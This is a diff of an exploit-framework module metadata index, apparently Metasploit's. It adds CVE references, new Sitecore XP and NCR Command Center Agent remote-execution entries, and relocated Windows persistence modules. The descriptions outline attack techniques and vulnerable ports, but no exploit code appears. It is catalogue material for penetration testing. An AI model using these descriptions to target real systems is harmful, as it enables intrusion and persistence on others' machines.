    ],
    "platform": "Windows",
@@ -178269,7 +179672,7 @@
    "targets": [
      "Windows Powershell"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/http/octopusdeploy_deploy.rb",
    "is_install_path": true,
    "ref_name": "windows/http/octopusdeploy_deploy",
@@ -179290,6 +180693,7 @@
    ],
    "description": "This module exploits a vulnerability found in RabidHamster R4's web server.\n          By supplying a malformed HTTP request, it is possible to trigger a stack-based\n          buffer overflow when generating a log, which may result in arbitrary code\n          execution under the context of the user.",
    "references": [
+      "CVE-2012-10058",
      "OSVDB-79007",
      "URL-http://aluigi.altervista.org/adv/r4_1-adv.txt"
    ],
@@ -179314,7 +180718,7 @@
    "targets": [
      "R4 v1.25"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/http/rabidhamster_r4_log.rb",
    "is_install_path": true,
    "ref_name": "windows/http/rabidhamster_r4_log",
@@ -179805,6 +181209,7 @@
    ],
    "description": "This module exploits an unauthenticated remote command execution vulnerability\n          in the console component of Serviio Media Server versions 1.4 to 1.8 on\n          Windows operating systems.\n\n          The console service (on port 23423 by default) exposes a REST API which\n          which does not require authentication.\n\n          The 'action' API endpoint does not sufficiently sanitize user-supplied data\n          in the 'VIDEO' parameter of the 'checkStreamUrl' method. This parameter is\n          used in a call to cmd.exe resulting in execution of arbitrary commands.\n\n          This module has been tested successfully on Serviio Media Server versions\n          1.4.0, 1.5.0, 1.6.0 and 1.8.0 on Windows 7.",
    "references": [
+      "CVE-2025-34101",
      "OSVDB-41961",
      "PACKETSTORM-142387",
      "URL-http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5408.php",
@@ -179831,7 +181236,7 @@
    "targets": [
      "Automatic Targeting"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/http/serviio_checkstreamurl_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "windows/http/serviio_checkstreamurl_cmd_exec",
@@ -180529,6 +181934,126 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/http/sitecore_xp_cve_2025_34510": {
+    "name": "Sitecore XP CVE-2025-34510 Post-Authentication Remote Code Execution",
+    "fullname": "exploit/windows/http/sitecore_xp_cve_2025_34510",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2025-06-17",
+    "type": "exploit",
+    "author": [
+      "Piotr Bazydlo",
+      "msutovsky-r7"
+    ],
+    "description": "This module exploits CVE-2025-34510, path traversal leading to remote code execution. The module exploits also CVE-2025-34509 - hardcoded credentials of ServicesAPI account - to gain foothold.",
+    "references": [
+      "CVE-2025-34510",
+      "URL-https://labs.watchtowr.com/is-b-for-backdoor-pre-auth-rce-chain-in-sitecore-experience-platform",
+      "URL-https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003667"
+    ],
+    "platform": "Windows",
+    "arch": "x86, x64",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows"
+    ],
+    "mod_time": "2025-09-11 11:04:34 +0000",
+    "path": "/modules/exploits/windows/http/sitecore_xp_cve_2025_34510.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/sitecore_xp_cve_2025_34510",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
+  "exploit_windows/http/sitecore_xp_cve_2025_34511": {
+    "name": "Sitecore XP CVE-2025-34511 Post-Authentication File Upload",
+    "fullname": "exploit/windows/http/sitecore_xp_cve_2025_34511",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2025-06-17",
+    "type": "exploit",
+    "author": [
+      "Piotr Bazydlo",
+      "msutovsky-r7"
+    ],
+    "description": "This module exploits CVE-2025-34511, a file upload vulnerability in PowerShell extensions. The module exploits also CVE-2025-34509 - hardcoded credentials of ServicesAPI account - to gain foothold.",
+    "references": [
+      "CVE-2025-34511",
+      "URL-https://labs.watchtowr.com/is-b-for-backdoor-pre-auth-rce-chain-in-sitecore-experience-platform",
+      "URL-https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003667"
+    ],
+    "platform": "Windows",
+    "arch": "x86, x64",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows"
+    ],
+    "mod_time": "2025-09-11 11:04:34 +0000",
+    "path": "/modules/exploits/windows/http/sitecore_xp_cve_2025_34511.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/sitecore_xp_cve_2025_34511",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/http/smartermail_rce": {
    "name": "SmarterTools SmarterMail less than build 6985 - .NET Deserialization Remote Code Execution",
    "fullname": "exploit/windows/http/smartermail_rce",
@@ -180961,6 +182486,7 @@
    ],
    "description": "This module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote user\n          can send a long string data in the Connection Header to causes an overflow on the\n          stack when function vsprintf() is used, and gain arbitrary code execution. The\n          module has been tested successfully on Windows 7 SP1 and Windows XP SP3.",
    "references": [
+      "CVE-2012-10053",
      "OSVDB-84310",
      "EDB-19937",
      "URL-http://ghostinthelab.wordpress.com/2012/07/19/simplewebserver-2-2-rc2-remote-buffer-overflow-exploit/"
@@ -180986,7 +182512,7 @@
    "targets": [
      "SimpleWebServer 2.2-rc2 / Windows XP SP3 / Windows 7 SP1"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/http/sws_connection_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/http/sws_connection_bof",
@@ -181706,6 +183232,7 @@
    ],
    "description": "This module can be used to execute a payload on Umbraco CMS 4.7.0.378.\n        The payload is uploaded as an ASPX script by sending a specially crafted\n        SOAP request to codeEditorSave.asmx, which permits unauthorized file upload\n        via the SaveDLRScript operation. SaveDLRScript is also subject to a path\n        traversal vulnerability, allowing code to be placed into the web-accessible\n        /umbraco/ directory.\n\n        The module writes, executes and then overwrites an ASPX script; note that\n        though the script content is removed, the file remains on the target. Automatic\n        cleanup of the file is intended if a meterpreter payload is used.\n\n        This module has been tested successfully on Umbraco CMS 4.7.0.378 on a Windows\n        7 32-bit SP1. In this scenario, the \"IIS APPPOOL\\ASP.NET v4.0\" user must have\n        write permissions on the Windows Temp folder.",
    "references": [
+      "CVE-2012-10054",
      "OSVDB-83765",
      "EDB-19671",
      "URL-http://blog.gdssecurity.com/labs/2012/7/3/find-bugs-faster-with-a-webmatrix-local-reference-instance.html",
@@ -181732,7 +183259,7 @@
    "targets": [
      "Umbraco CMS 4.7.0.378 / Microsoft Windows 7 Professional 32-bit SP1"
    ],
-    "mod_time": "2025-06-20 13:20:44 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/http/umbraco_upload_aspx.rb",
    "is_install_path": true,
    "ref_name": "windows/http/umbraco_upload_aspx",
@@ -181814,7 +183341,9 @@
      "Daniel Teixeira"
    ],
    "description": "This module exploits a stack-based buffer overflow vulnerability\n          in the web interface of VX Search Enterprise v9.5.12, caused by\n          improper bounds checking of the request path in HTTP GET requests\n          sent to the built-in web server. This module has been tested\n          successfully on Windows 7 SP1 x86.",
-    "references": [],
+    "references": [
+      "CVE-2017-13708"
+    ],
    "platform": "Windows",
    "arch": "",
    "rport": 80,
@@ -181836,7 +183365,7 @@
    "targets": [
      "VX Search Enterprise v9.5.12"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/http/vxsrchs_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/http/vxsrchs_bof",
@@ -181988,7 +183517,9 @@
      "theLightCosine <theLightCosine@metasploit.com>"
    ],
    "description": "This module exploits weak WebDAV passwords on XAMPP servers.\n          It uses supplied credentials to upload a PHP payload and\n          execute it.",
-    "references": [],
+    "references": [
+      "CVE-2012-10062"
+    ],
    "platform": "PHP",
    "arch": "php",
    "rport": 80,
@@ -182010,14 +183541,25 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-06-20 13:20:44 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/http/xampp_webdav_upload_php.rb",
    "is_install_path": true,
    "ref_name": "windows/http/xampp_webdav_upload_php",
    "check": false,
    "post_auth": true,
    "default_credential": false,
-    "notes": {},
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
    "session_types": false,
    "needs_cleanup": null
  },
@@ -183510,6 +185052,7 @@
    ],
    "description": "This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP AUTHENTICATE\n          GSSAPI command. By sending an overly long string, an attacker can overwrite the\n          buffer and control program execution. Using the PAYLOAD of windows/shell_bind_tcp\n          or windows/shell_reverse_tcp allows for the most reliable results.",
    "references": [
+      "CVE-2005-1758",
      "OSVDB-55175"
    ],
    "platform": "Windows",
@@ -183520,7 +185063,7 @@
    "targets": [
      "Windows 2000 SP0-SP4 English"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/imap/novell_netmail_auth.rb",
    "is_install_path": true,
    "ref_name": "windows/imap/novell_netmail_auth",
@@ -184156,6 +185699,7 @@
    ],
    "description": "This module exploits a vulnerability in the FlexNet\n          License Server Manager.\n\n          The vulnerability is due to the insecure usage of memcpy\n          in the lmgrd service when handling network packets, which\n          results in a stack buffer overflow.\n\n          In order to improve reliability, this module will make lots of\n          connections to lmgrd during each attempt to maximize its success.",
    "references": [
+      "CVE-2011-4135",
      "OSVDB-81899",
      "BID-52718",
      "ZDI-12-052",
@@ -184173,7 +185717,7 @@
      "Alias License Tools 10.8.0.7 / lmgrd 10.8.0.7 / Windows XP SP3",
      "Alias License Tools 10.8 / lmgrd 10.8.0.2 / Windows XP SP3"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/license/flexnet_lmgrd_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/license/flexnet_lmgrd_bof",
@@ -184306,6 +185850,7 @@
    ],
    "description": "This module exploits a directory traversal vulnerability on Agnitum Outpost Internet\n            Security 8.1. The vulnerability exists in the acs.exe component, allowing the user to load\n            arbitrary DLLs through the acsipc_server named pipe, and finally execute arbitrary\n            code with SYSTEM privileges. This module has been tested successfully on Windows 7 SP1 with\n            Agnitum Outpost Internet Security 8.1 (32 bits and 64 bits versions).",
    "references": [
+      "CVE-2013-10046",
      "OSVDB-96208",
      "EDB-27282"
    ],
@@ -184317,7 +185862,7 @@
    "targets": [
      "Agnitum Outpost Internet Security 8.1"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/local/agnitum_outpost_acs.rb",
    "is_install_path": true,
    "ref_name": "windows/local/agnitum_outpost_acs",
@@ -187125,7 +188670,7 @@
      "msutovsky-r7 <martin_sutovsky@rapid7.com>",
      "James Williams"
    ],
-    "description": "This module exploits a bug in LIQPad up to version 5.48.00. The bug is only exploitable in paid version of software. The core of a bug is cache file containing deserialized data, which attacker can overwrite with malicious payload. The data gets deserialized every time the app restarts.",
+    "description": "This module exploits a bug in LINQPad up to version 5.52.00. The bug is only exploitable in paid version of software. The core of a bug is cache file containing deserialized data, which attacker can overwrite with malicious payload. The data gets deserialized every time the app restarts.",
    "references": [
      "URL-https://trustedsec.com/blog/discovering-a-deserialization-vulnerability-in-linqpad",
      "CVE-2024-53326"
@@ -187138,7 +188683,7 @@
    "targets": [
      "Windows"
    ],
-    "mod_time": "2025-05-06 08:43:57 +0000",
+    "mod_time": "2025-10-19 10:05:48 +0000",
    "path": "/modules/exploits/windows/local/linqpad_deserialization_persistence.rb",
    "is_install_path": true,
    "ref_name": "windows/local/linqpad_deserialization_persistence",
@@ -188485,6 +190030,7 @@
    ],
    "description": "This module allows an attacker with an unprivileged windows account to gain admin access on windows system and start a shell.\n          For this module to work, both the NSClient++ web interface  and `ExternalScripts` features must be enabled.\n          You must also know where the NSClient config file is, as it is used to read the admin password which is stored in clear text.",
    "references": [
+      "CVE-2025-34078",
      "EDB-48360",
      "EDB-46802"
    ],
@@ -188509,7 +190055,7 @@
    "targets": [
      "Windows"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/local/nscp_pe.rb",
    "is_install_path": true,
    "ref_name": "windows/local/nscp_pe",
@@ -188690,7 +190236,9 @@
      "Security-Assessment.com"
    ],
    "description": "PSEvents.exe within several Panda Security products runs hourly with SYSTEM privileges.\n          When run, it checks a user writable folder for certain DLL files, and if any are found\n          they are automatically run.\n          Vulnerable Products:\n          Panda Global Protection 2016 (<=16.1.2)\n          Panda Antivirus Pro 2016 (<=16.1.2)\n          Panda Small Business Protection (<=16.1.2)\n          Panda Internet Security 2016 (<=16.1.2)",
-    "references": [],
+    "references": [
+      "CVE-2025-34109"
+    ],
    "platform": "Windows",
    "arch": "",
    "rport": null,
@@ -188700,7 +190248,7 @@
      "Windows x86",
      "Windows x64"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/local/panda_psevents.rb",
    "is_install_path": true,
    "ref_name": "windows/local/panda_psevents",
@@ -188816,54 +190364,6 @@
    "needs_cleanup": null,
    "actions": []
  },
-  "exploit_windows/local/persistence_image_exec_options": {
-    "name": "Windows Silent Process Exit Persistence",
-    "fullname": "exploit/windows/local/persistence_image_exec_options",
-    "aliases": [],
-    "rank": 600,
-    "disclosure_date": "2008-06-28",
-    "type": "exploit",
-    "author": [
-      "Mithun Shanbhag",
-      "bwatters-r7"
-    ],
-    "description": "Windows allows you to set up a debug process when a process exits.\n          This module uploads a payload and declares that it is the debug\n          process to launch when a specified process exits.",
-    "references": [
-      "URL-https://attack.mitre.org/techniques/T1183/",
-      "URL-https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/"
-    ],
-    "platform": "Windows",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [],
-    "autofilter_services": [],
-    "targets": [
-      "Automatic"
-    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
-    "path": "/modules/exploits/windows/local/persistence_image_exec_options.rb",
-    "is_install_path": true,
-    "ref_name": "windows/local/persistence_image_exec_options",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "Reliability": [
-        "unknown-reliability"
-      ],
-      "Stability": [
-        "unknown-stability"
-      ],
-      "SideEffects": [
-        "unknown-side-effects"
-      ]
-    },
-    "session_types": [
-      "meterpreter"
-    ],
-    "needs_cleanup": null,
-    "actions": []
-  },
  "exploit_windows/local/persistence_service": {
    "name": "Windows Persistent Service Installer",
    "fullname": "exploit/windows/local/persistence_service",
@@ -189273,51 +190773,6 @@
    "needs_cleanup": null,
    "actions": []
  },
-  "exploit_windows/local/registry_persistence": {
-    "name": "Windows Registry Only Persistence",
-    "fullname": "exploit/windows/local/registry_persistence",
-    "aliases": [],
-    "rank": 600,
-    "disclosure_date": "2015-07-01",
-    "type": "exploit",
-    "author": [
-      "Donny Maasland <donny.maasland@fox-it.com>"
-    ],
-    "description": "This module will install a payload that is executed during boot.\n          It will be executed either at user logon or system startup via the registry\n          value in \"CurrentVersion\\Run\" (depending on privilege and selected method).\n          The payload will be installed completely in registry.",
-    "references": [],
-    "platform": "Windows",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [],
-    "autofilter_services": [],
-    "targets": [
-      "Automatic"
-    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
-    "path": "/modules/exploits/windows/local/registry_persistence.rb",
-    "is_install_path": true,
-    "ref_name": "windows/local/registry_persistence",
-    "check": true,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "Reliability": [
-        "unknown-reliability"
-      ],
-      "Stability": [
-        "unknown-stability"
-      ],
-      "SideEffects": [
-        "unknown-side-effects"
-      ]
-    },
-    "session_types": [
-      "meterpreter",
-      "shell"
-    ],
-    "needs_cleanup": null,
-    "actions": []
-  },
  "exploit_windows/local/ricoh_driver_privesc": {
    "name": "Ricoh Driver Privilege Escalation",
    "fullname": "exploit/windows/local/ricoh_driver_privesc",
@@ -190483,6 +191938,7 @@
    ],
    "description": "This module exploits a Unicode SEH buffer overflow in Achat. By\n          sending a crafted message to the default port 9256/UDP, it's possible to overwrite the\n          SEH handler. Even when the exploit is reliable, it depends on timing since there are\n          two threads overflowing the stack in the same time. This module has been tested on\n          Achat v0.150 running on Windows XP SP3 and Windows 7.",
    "references": [
+      "CVE-2025-34127",
      "CWE-121"
    ],
    "platform": "Windows",
@@ -190493,7 +191949,7 @@
    "targets": [
      "Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1"
    ],
-    "mod_time": "2025-07-30 16:13:01 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/misc/achat_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/misc/achat_bof",
@@ -190528,6 +191984,7 @@
    ],
    "description": "This module exploits a vulnerability in ActFax Server 5.01 RAW server. The RAW\n          Server can be used to transfer fax messages without any underlying protocols. To\n          note significant fields in the fax being transferred, like the fax number or the\n          recipient, ActFax data fields can be used. This module exploits a buffer overflow\n          in the handling of the @F506 fields due to the insecure usage of strcpy. This\n          module has been tested successfully on ActFax 5.01 over Windows XP SP3 (English).",
    "references": [
+      "CVE-2013-10064",
      "OSVDB-89944",
      "BID-57789",
      "EDB-24467",
@@ -190541,7 +191998,7 @@
    "targets": [
      "ActFax 5.01 / Windows XP SP3"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/misc/actfax_raw_server_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/misc/actfax_raw_server_bof",
@@ -194470,6 +195927,7 @@
    ],
    "description": "This module utilizes the Mobile Mouse Server by RPA Technologies, Inc protocol\n          to deploy a payload and run it from the server.  This module will only deploy\n          a payload if the server is set without a password (default).\n          Tested against 3.6.0.4, current at the time of module writing",
    "references": [
+      "CVE-2023-31902",
      "EDB-51010",
      "URL-https://mobilemouse.com/"
    ],
@@ -194481,7 +195939,7 @@
    "targets": [
      "default"
    ],
-    "mod_time": "2022-09-27 14:51:03 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/misc/mobile_mouse_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/misc/mobile_mouse_rce",
@@ -194600,6 +196058,50 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/misc/ncr_cmcagent_rce": {
+    "name": "NCR Command Center Agent Remote Code Execution",
+    "fullname": "exploit/windows/misc/ncr_cmcagent_rce",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": "2021-02-07",
+    "type": "exploit",
+    "author": [
+      "daffainfo (Muhammad Daffa)",
+      "jjcho (Jericho Nathanael Chrisnanta)"
+    ],
+    "description": "CMCAgent in NCR Command Center Agent 16.3 on Aloha POS/BOH servers permits the submission of a runCommand parameter\n          (within an XML document sent to port 8089) that enables the remote, unauthenticated execution of an arbitrary command\n          as SYSTEM, as exploited in the wild in 2020 and/or 2021. The vendor's position is that exploitation occurs only\n          on devices with a certain \"misconfiguration.\"",
+    "references": [
+      "CVE-2021-3122",
+      "URL-https://www.tetradefense.com/incident-response-services/active-exploit-a-remote-code-execution-rce-vulnerability-for-ncr-aloha-point-of-sale/",
+      "URL-https://hcs-team.com/blog/cve-2021-3122/"
+    ],
+    "platform": "Windows",
+    "arch": "x64, x86",
+    "rport": 8089,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Windows"
+    ],
+    "mod_time": "2025-10-30 07:43:32 +0000",
+    "path": "/modules/exploits/windows/misc/ncr_cmcagent_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/misc/ncr_cmcagent_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": []
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/misc/netcat110_nt": {
    "name": "Netcat v1.10 NT Stack Buffer Overflow",
    "fullname": "exploit/windows/misc/netcat110_nt",
@@ -195023,6 +196525,7 @@
    ],
    "description": "This module utilizes the Remote Control Server's, part\n          of the Remote Control Collection by Steppschuh, protocol\n          to deploy a payload and run it from the server.  This module will only deploy\n          a payload if the server is set without a password (default).\n          Tested against 3.1.1.12, current at the time of module writing",
    "references": [
+      "CVE-2022-4978",
      "URL-http://remote-control-collection.com",
      "URL-https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20control%20collection/remote-control-collection-rce.py"
    ],
@@ -195034,7 +196537,7 @@
    "targets": [
      "default"
    ],
-    "mod_time": "2022-10-28 15:03:39 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/misc/remote_control_collection_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/misc/remote_control_collection_rce",
@@ -195355,6 +196858,7 @@
    ],
    "description": "This module exploits a vulnerability in SPlayer v3.7 or prior.  When SPlayer\n          requests the URL of a media file (video or audio), it is possible to gain arbitrary\n          remote code execution due to a buffer overflow caused by an exceeding length of data\n          as the 'Content-Type' parameter.",
    "references": [
+      "CVE-2011-10022",
      "OSVDB-72181",
      "EDB-17243"
    ],
@@ -195366,7 +196870,7 @@
    "targets": [
      "Windows XP SP2/XP3"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/misc/splayer_content_type.rb",
    "is_install_path": true,
    "ref_name": "windows/misc/splayer_content_type",
@@ -195447,6 +196951,7 @@
    ],
    "description": "This module exploits a stack buffer overflow in Talkative IRC v0.4.4.16.\n          When a specially crafted response string is sent to a client,\n          an attacker may be able to execute arbitrary code.",
    "references": [
+      "CVE-2009-20007",
      "OSVDB-64582",
      "BID-34141",
      "EDB-8227"
@@ -195459,7 +196964,7 @@
    "targets": [
      "Windows XP SP3 English"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/misc/talkative_response.rb",
    "is_install_path": true,
    "ref_name": "windows/misc/talkative_response",
@@ -195593,6 +197098,7 @@
    ],
    "description": "This module exploits a buffer overflow in the IRC client component of\n          UFO: Alien Invasion 2.2.1.",
    "references": [
+      "CVE-2009-10006",
      "OSVDB-65689",
      "EDB-14013"
    ],
@@ -195604,7 +197110,7 @@
    "targets": [
      "Windows XP Universal"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/windows/misc/ufo_ai.rb",
    "is_install_path": true,
    "ref_name": "windows/misc/ufo_ai",
@@ -197837,6 +199343,212 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/persistence/image_exec_options": {
+    "name": "Windows Silent Process Exit Persistence",
+    "fullname": "exploit/windows/persistence/image_exec_options",
+    "aliases": [
+      "exploits/windows/local/persistence_image_exec_options"
+    ],
+    "rank": 600,
+    "disclosure_date": "2008-06-28",
+    "type": "exploit",
+    "author": [
+      "Mithun Shanbhag",
+      "bwatters-r7"
+    ],
+    "description": "Windows allows you to set up a debug process when a process exits.\n          This module uploads a payload and declares that it is the debug\n          process to launch when a specified process exits.",
+    "references": [
+      "ATT&CK-T1183",
+      "URL-https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2025-09-26 15:44:31 +0000",
+    "path": "/modules/exploits/windows/persistence/image_exec_options.rb",
+    "is_install_path": true,
+    "ref_name": "windows/persistence/image_exec_options",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null,
+    "actions": []
+  },
+  "exploit_windows/persistence/registry": {
+    "name": "Windows Registry Only Persistence",
+    "fullname": "exploit/windows/persistence/registry",
+    "aliases": [
+      "exploits/windows/local/registry_persistence"
+    ],
+    "rank": 600,
+    "disclosure_date": "2015-07-01",
+    "type": "exploit",
+    "author": [
+      "Donny Maasland <donny.maasland@fox-it.com>",
+      "h00die"
+    ],
+    "description": "This module will install a payload that is executed during boot.\n          It will be executed either at user logon or system startup via the registry\n          value in \"CurrentVersion\\Run\" or \"RunOnce\" (depending on privilege and selected method).\n          The payload will be installed completely in registry.",
+    "references": [
+      "ATT&CK-T1547.001",
+      "ATT&CK-T1112",
+      "URL-https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys",
+      "URL-https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2025-10-23 17:44:22 +0000",
+    "path": "/modules/exploits/windows/persistence/registry.rb",
+    "is_install_path": true,
+    "ref_name": "windows/persistence/registry",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "event-dependent",
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "config-changes",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": [
+      "meterpreter",
+      "shell"
+    ],
+    "needs_cleanup": null,
+    "actions": []
+  },
+  "exploit_windows/persistence/startup_folder": {
+    "name": "Windows Persistent Startup Folder",
+    "fullname": "exploit/windows/persistence/startup_folder",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "1995-01-01",
+    "type": "exploit",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module establishes persistence by creating a payload in the user or system startup folder.\n          Works on Vista and newer systems.",
+    "references": [
+      "ATT&CK-T1547.001",
+      "URL-https://support.microsoft.com/en-us/windows/configure-startup-applications-in-windows-115a420a-0bff-4a6f-90e0-1934c844e473"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2025-10-29 05:18:20 +0000",
+    "path": "/modules/exploits/windows/persistence/startup_folder.rb",
+    "is_install_path": true,
+    "ref_name": "windows/persistence/startup_folder",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": [
+      "meterpreter",
+      "shell"
+    ],
+    "needs_cleanup": null,
+    "actions": []
+  },
+  "exploit_windows/persistence/task_scheduler": {
+    "name": "Windows Persistent Task Scheduler",
+    "fullname": "exploit/windows/persistence/task_scheduler",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "1998-05-15",
+    "type": "exploit",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module establishes persistence by creating a scheduled task to run a payload.",
+    "references": [
+      "ATT&CK-T1053.005",
+      "URL-https://learn.microsoft.com/en-us/windows/win32/taskschd/task-scheduler-start-page"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2025-10-29 05:22:55 +0000",
+    "path": "/modules/exploits/windows/persistence/task_scheduler.rb",
+    "is_install_path": true,
+    "ref_name": "windows/persistence/task_scheduler",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
